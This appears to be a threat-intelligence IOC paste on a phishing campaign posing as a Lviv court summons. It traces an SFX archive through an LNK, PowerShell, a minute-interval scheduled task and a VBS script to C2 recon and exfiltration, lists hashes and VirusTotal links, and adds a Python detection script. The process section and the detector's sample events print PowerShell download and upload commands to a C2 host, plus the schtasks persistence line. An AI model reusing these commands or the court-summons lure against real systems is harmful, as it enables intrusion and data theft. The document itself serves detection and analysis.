- #IOC #OptiData #VR #WSH #RAR #SFX #powershell #task
- https://pastebin.com/rpFYCNPS
- attack_vector
- --------------
- email attach .rar (sfx) > .lnk > ps > task > Libraries.vbs > connect > recon > exfil
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: Wed, 08 Nov 2023 11:48:25 +0200
- Subject: Розсилка процесуальних документів, справа № 623/6341/11, Судова повістка про виклик в суд. [EN: Distribution of procedural documents, case No. 623/6341/11, Court summons.]
- From: СПД 3.9 (Франківський районний суд м.Львова) <spd.1331.ics.gov@ukr.net> [EN: SPD 3.9 (Frankivskyi District Court of Lviv)]
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
- File name Повiстка-623-6341-11.rar [ WinRAR Self Extracting archive ]
- File size 331.92 KB (339886 bytes)
- SHA-256 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
- File name Повiстка-623-6341-11.docx.lnk [ Windows shortcut ]
- File size 19.86 KB (20332 bytes)
- SHA-256 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
- File name Libraries.vbs [ WSH ]
- File size 747 B (747 bytes)
- SHA-256 f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
- File name 623-6341-11.docx [ Microsoft Word 2007+ ]
- File size 13.52 KB (13840 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email_attach
- C2 196.196. 156{ .2
- netwrk
- --------------
- 196.196. 156{ .2 196.196. 156{ .2:57881 57881 HTTP GET /HcKOAhaZgDePKGKF/page213/upgrade.txt HTTP/1.1
- 196.196. 156{ .2 196.196. 156{ .2:49210 49210 HTTP POST /page213 HTTP/1.1
- comp
- --------------
- powershell.exe 916 196.196. 156{ .2 57881
- powershell.exe 916 196.196. 156{ .2 49210
- proc
- --------------
- powershell.exe ...
- WINWORD.EXE /n /dde
- schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f
- {another context}
- WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
- powershell.exe net.webclient;$flm=$iik.
- downloaddata ('196.196.156{ .2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');
- uploaddata('196.196.156{ .2:49210/page213',$drpy);}
- ...
- whoami.exe
- systeminfo.exe
- ipconfig.exe
- net.exe" view
- ROUTE.EXE print -4 -6
- RP.EXE -a
- NETSTAT.EXE -ant
- TRACERT.EXE 8.8.8.8
- persist
- --------------
- \ExplorerCoreUpdateTaskMachine C:\Users\Public\Libraries\Libraries.vbs [task]
- drop
- --------------
- %temp%\623-6341-11.docx
- C:\Users\Public\Libraries\Libraries.vbs
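Detection logic for the chain recorded in the proc/persist/drop sections above (schtasks creating a minute-interval task pointing at a script under C:\Users\Public, WScript.exe running that script, PowerShell using Net.WebClient DownloadData/UploadData), as an added example that is not part of the original paste. The event fields, the 203.0.113.5 address and the benign schtasks /query line are constructed.

```python
"""Flag process-creation events matching the persistence/execution chain
from this paste. Added example, not the paste author's code; the event
format and the sample lines below are constructed."""
import re

# Constructed sample process-creation events: (image path, command line).
EVENTS = [
    ("C:\\Windows\\System32\\schtasks.exe",
     "schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 "
     "/tr C:\\Users\\Public\\Libraries\\Libraries.vbs /f"),
    ("C:\\Windows\\System32\\WScript.exe",
     'WScript.exe "C:\\Users\\Public\\Libraries\\Libraries.vbs"'),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe $iik=new-object net.webclient;"
     "$flm=$iik.downloaddata('http://203.0.113.5:57881/upgrade.txt');"   # constructed C2
     "$iik.uploaddata('http://203.0.113.5:49210/page213',$drpy)"),
    ("C:\\Windows\\System32\\schtasks.exe",                               # benign control
     "schtasks.exe /query /TN \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"),
]

# Script file under the world-writable C:\Users\Public tree.
PUBLIC_SCRIPT = re.compile(r"c:\\users\\public\\.*\.(vbs|js|wsf|ps1|bat)\b", re.I)


def classify(image: str, cmdline: str) -> list[str]:
    """Return the names of the rules a single process event matches."""
    hits = []
    cl = cmdline.lower()
    exe = image.rsplit("\\", 1)[-1].lower()
    # Persistence: short-interval task whose action is a script in C:\Users\Public.
    if exe == "schtasks.exe" and "/create" in cl and "/sc minute" in cl \
            and PUBLIC_SCRIPT.search(cmdline):
        hits.append("schtasks_minute_task_public_script")
    # Execution: Windows Script Host launching a script from C:\Users\Public.
    if exe in ("wscript.exe", "cscript.exe") and PUBLIC_SCRIPT.search(cmdline):
        hits.append("wsh_script_from_public_dir")
    # Transfer: PowerShell Net.WebClient download/upload in the command line.
    if exe == "powershell.exe" and "net.webclient" in cl \
            and ("downloaddata" in cl or "uploaddata" in cl):
        hits.append("powershell_webclient_transfer")
    return hits


def scan(events):
    """Map each matching command line to its rule hits; benign events are skipped."""
    return {cmd: classify(img, cmd) for img, cmd in events if classify(img, cmd)}


if __name__ == "__main__":
    for cmd, rules in scan(EVENTS).items():
        print(rules, "<-", cmd[:70])
```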
- # # # # # # # #
- additional info
- # # # # # # # #
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a/details
- https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/details
- https://www.virustotal.com/gui/file/39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe/details
- https://www.virustotal.com/gui/file/f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e/details
- VR